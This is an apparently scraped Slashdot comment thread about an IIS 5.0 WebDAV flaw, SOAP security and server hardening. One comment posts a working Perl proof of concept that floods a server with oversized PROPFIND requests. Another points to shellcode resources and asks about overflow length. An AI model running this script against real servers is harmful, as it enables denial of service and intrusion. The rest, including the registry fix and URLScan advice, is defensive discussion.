It is a RPC mechanism which is primarilly layered on top of HTTP. Don't make the mistake that just becuase it typically uses HTTP for transport, or is used in "Web Services" that it will only be used in a benign way, or that it is benign by design.
People are alreay starting to use it for mission critical RPC. It is a disaster waiting to happen.
/mike
-- "So, what's the deal with Auntie Gerschwitz et all?"
It's nice to get worked up about all these holes and patches but if half the jokers who are running NT/2000 boxes for a living would just do their job they wouldn't have a problem.
:P
I've had my servers configured (locked down) the same way for the last year and a half and guess what....none of these vulnerabilities (including that lame SQL worm) made any difference to me. I was already protected all because I did a little research into what other people (who have time to research this stuff) said about how to properly harden a MS server (web or db). Oh and there's this neat thing called IISLockdown that disables WebDAV for you IF YOU RUN IT! Oh and it's part of an even neater thing called Microsoft Baseline Security Analyzer that helps you do lots of other stuff. That's only been around for a year or more. But hey, don't worry about it now. If you've got a MS server on the web and don't know what I (or anyone else here) am talking about then your servers are prolly hosed anyway. There's no excuse for bad admin.
Oh and before I get any lame "oh, you must not have them plugged in then...yuk yuk yuk" comments, yes they are plugged in. To the Internet in a datacenter even.
And no, you can't have the IP.
The advantage is that most managers don't like radical changes. Once you have everything you need running under CYGWIN and the next MS OS bug appears, you can very easily drop Win2K and move to Linux because your apps are already Linux compatible.
Well I guess it's ok to make mistakes, as long as you're doing it with Linux. Welcome to /.
Err, no
Err yes! That's what it was designed for. A way of allowing website website communication as well as thickclient website communication.
It is a RPC mechanism which is primarilly layered on top of HTTP. Don't make the mistake that just becuase it typically uses HTTP for transport, or is used in "Web Services" that it will only be used in a benign way, or that it is benign by design.
People are alreay starting to use it for mission critical RPC. It is a disaster waiting to happen.
Um. Kind of like how people are using HTTP and the web for mission critical *manual* data input and presentation?
Slash removed my arrows.
The third sentence should be:
A way of allowing website <-> website communication as well as thickclient <-> website communication.
Test your server...
/>'."<u:$over />".'</a:prop></a:propfind>'."\n\n"; />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;
print "IIS 5.0 propfind\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$over=$ch x $ll; #string to overflow
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop ><a:displayname
# ^^^^ This is another issue and also works with length ~>65000
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname
$l=length($xml);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,300);
#print "r=".$res;
close $socket;
}
do vv(128008,"V"); # may need to change the length
sleep(1);
do vv(128008,"V");
print "Done.\n";
... and then there were none
No, you are still wrong. SOAP really has nothing to do with web sites.
It *can* be used by web sites to provide an API for programmatic access to that site's data and functionality, but using SOAP in this manner is actually quite redundant: You can do the same thing without SOAP and in a more architecturally sound manner.
This is beside the point, however. SOAP has nothing to do with the web, or web sites, other than the fact it uses HTTP as it's default transport.
SOAP was a spin-off of XML-RPC. Dave Winer developed XML-RPC as a simple RPC mechanism for Userland Frontier, to allow other applications integrate with it. Microsoft picked XML-RPC up (probably becuase it is very buzzword-compilant, and can easily get through those pesky firewalls), turned it into a RPC mechanism for "objects" - which is a lie, they basically just gave it an extensible type system - and let it loose. See XML-RPC for Newbies for a more detailed early history.
No, it is being used for RPC (Remote Procedure Call) - a form of IPC (Inter-Process Communications). This is far more dangerous. People are exposing programmatic interfaces to mission-critical systems. These interfaces allow other computers to manipulate data on those remote mission-critical systems. Think of having direct access to Amex's customer database vs. having access to their web site. It is a massively different situation.
/mike
-- "So, what's the deal with Auntie Gerschwitz et all?"
response.write "Who needs a damn debugger"
Got Code?
Sitting on security vulnerabilities until several fixes are available and releasing them as one advisory is a good trick to try to reduce the overal number of advisories, without actually having to improve the quality or security of the product.
For a while patches were announced on Thursdays and for a while before that it was Fridays. Fridays must have run too much overtime and shown up on the boardroom radar. Thursday in Seattle is already Friday in Europe so maybe this is a play to get MSTD-induced overtime back off the radar of European managers. With a legal cap of around 37.5 hours per week per tech, business can't afford too many IIS servers.
It is strange that any would try to. Microsoft-IIS is not a viable alternative to Zeus or Apache.
Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
ROTFL
Please, mod up parent.
It's like The Birds only with little pieces of paper attached to their legs.
"Care to explain how you would do it in a more "architecturally sound manner"?"
For a web site? Use REST. For anything else? Use a well designed IPC protocol.
"If there's a programming flaw that allows you access to Amex's customer database it could just as easily occur in the website."
Sigh. If a security hole is found in a webserver, the impact will likely be far, far less than if a hole is found in a SOAP implementation. The difference is what people are going to do with the technology, and how they are going to do it. What SOAP's role in a software architecture is. A web site won't let you *directly* query customer records, or *directly* make purchases. A SOAP API will.
"SOAP definitely has its place".
No it doesn't. It violates the Web and Internet architectures. It makes it easy to get around network security. It piggy-backs on application-level protocols which it shoudn't. It pretends to not be an application-level protocol when it is.
Whilst it looks nice, SOAP is quite fundamentally broken.
-- "So, what's the deal with Auntie Gerschwitz et all?"
..... I'm getting really bored with this one.....
I could not agree with you more. Conventional Internet style network security is based on the convention that we expose different services on different well known ports. To control access to those services we simply control access to these ports. Consequently a firewall doesn't have to parse the content of packets or understand the details of higher level protocols, it simply has to know which ports to allow and which to block. This means that firewall processes can be lightweight and efficient.
If you overload a port to provide many different services on the same port this security model doesn't work any longer. You can no longer trust any traffic to any port. Instead, you need a much more complex firewall which (inter alia) can parse soap packets and decide which soap packets to pass and which to block. This makes the firewall much more complex and much more processor (and memory) intensive.
I could not agree with you less. Port overloading is completely inimical to nerwork security. Once undereducated code monkeys are able to put J Random Soap Handler on port 80, either you block port 80 or you have no network security left.
I'm old enough to remember when discussions on Slashdot were well informed.
go to deepzone.org for shellcode and shellcode generator. anyone know how long the buffer overflow has to be?
How on earth can anyone seriously think about using .net, that for all intents *forces* you to use IIS (a.k.a. the Instant Intrusion Service)?
Seems like it's about time to rename IIS to Apache (a patchy)?
HiPerExchange is a WebDAV server that runs on the machines of individual email users, allowing them to efficiently access email using Outlook Web Access. See the HiPerExchange Technology Primer for more detailed information.
So that's why Microsoft responded so promptly in fixing this bug! National Security and all that!
I mean relatively promptly given that Microsoft is involved!
I thought that Chairman Bill said that it would all be as easy as point 'n click?
It never occurred to me until I read the parent to do this for the (sigh) 2 servers I have to run IISs on for a specific app. Copy and paste this into a text file (notepad) named diableWebDAV.reg, then double click to add to any registry:
r vi ces\W3SVC\Parameters]
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Se
"DisableWebDAV"=dword:1
I am, and always will be, an idiot. Karma: Coma (mostly effected by
Comment removed based on user account deletion
As much as I hate NineNine's stinking and corrupted guts, he is correct. You can change the user that IIS runs as very easily. (I've only worked with IIS 4.0 up to this point) Just open the services control panel applet, scroll down to World Wide Web Publishing service and set the user account for IIS to run as.
However, I will make an observation here: NO internet server can be secured if it's shipped with default settings since default settings cannot remain secure indefinitely. If a server admin MUST explicitly specify server settings, then you will have a more secure server because it will result in uniqueness. MS is horrible at this because you can install IIS and it "just works" without the admin EVER being prompted to secure the server's configuration. I believe they've changed that a bit with IIS 5 but can't speak for it since I don't know it. But if MS really wanted to go the extra mile with security they would make the IIS lockdown tool a required PART OF THE SETUP!!!
One of the reasons that Apache is perceived as more secure than IIS is that for most people the default settings are not usable, so they HAVE to edit the config file. This forces them to notice that Apache is probably running as 'nobody' and a few other settings that they probably don't want ticked on or off. If the admin is smart, he changes this setting and uses the chroot options. (Damn wouldn't it be nice if chroot was an option in Windows?)
Un-news
The default configuration of URLScan prevents the vulnerability from being exploited. URLScan is a part of the IIS Lockdown tool. For more information about URLScan, visit the following Microsoft Web site: http://www.microsoft.com/technet/security/URLScan. asp
Prevent linux based DDOS's!
http://linux.denialofservice.org/
Planning ahead, same as prepense. Which admittedly doesn't characterise Microsoft products very well. (-:
Got time? Spend some of it coding or testing
This is from "Microsoft Security Bulletin MS03-007" Frequently asked questions:
Why has Microsoft changed the information in the Caveats section of this bulletin?
Microsoft was made aware that some customers who had received a hotfix from Product Support Services experienced stop errors on boot after applying the patch released for this bulletin.
We've assessed this issue and now know that it only occurs under a specific set of circumstances. A series of Windows 2000 hotfixes that were only available through Product Support Services and were issued between December 2001 and February 2002 were incompatible with the patch for this vulnerability. Customers who are running one of those 12 hotfixes on Windows 2000 Service Pack 2 will experience a stop error on reboot after applying this patch. More information on how to determine if you have installed a hotfix that is incompatible with this patch is available in the Addition Information section under Caveats.
Customers who are running Windows 2000 Service Pack 3 or are not running one of these hotfixes will not encounter this problem.
to patch or not to patch....
The problem is, although you _can_ do this, it's not a supported setting, and will cause a lot of things to break (namely the things people rely on IIS for in the first place).
Engineering and the Ultimate
Like all of Microsoft's more baroque products, WebDAV is an attempt to make life easier for the technically clueless. Its design reflects what I call the Wizard Fallacy: the assumption that you can make a complicated process easy by glossing it over with some hand-holding software. This never works well, but requires less imagination than inventing a new procedure that's easy to understand and use.
The society which scorns excellence in plumbing as a humble activity and
tolerates shoddiness in philosophy because it is an exalted activity will
have neither good plumbing nor good philosophy... neither its pipes nor
its theories will hold water.
- this post brought to you by the Automated Last Post Generator...